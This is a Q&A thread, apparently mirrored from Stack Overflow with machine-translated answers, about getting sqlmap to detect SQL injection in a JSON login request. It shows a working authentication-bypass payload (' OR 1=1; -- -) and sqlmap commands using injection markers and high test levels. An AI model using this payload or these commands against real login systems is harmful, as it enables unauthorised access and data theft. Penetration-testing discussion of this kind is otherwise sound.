6

Hi I'm trying to do a SQL injection in a login form.

With BurpSuite I intercept the request:

POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close

{"username”:"user",”password”:"pass"}

using:

sqlmap -u requestFile

(where requestFile is the content of the request intercepted with Burp)

sqlmap can't find the injectable field that is password.

I'm sure that's it's injectable cause if as password I input:

' OR 1=1; -- -

I can login with every username I insert

Tried also with:

{"username”:*,”password”:*}

but no luck.

What I'm doing wrong?

4

2 回答 2

5

例子:

POST / HTTP/1.1
Host: www.example.com

{"username":"*", "password":"*"}

另存为sqlrequest.txt

然后可以使用以下命令启动测试:

py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl

然后,您应该会收到一个提示,提示您找到了自定义注入标记,并且在 POST 正文中找到了 JSON 数据。处理两者,然后你就可以开始了。

在此处输入图像描述

资料来源:

https://security.stackexchange.com/a/150506/67046

https://security.stackexchange.com/a/51862/67046

于 2021-02-09T18:25:47.910 回答
-3

sqlmap -u 网址

sqlmap -r 请求文件

关于如何使用请求的教程

检查这个视频

于 2017-03-20T16:01:54.020 回答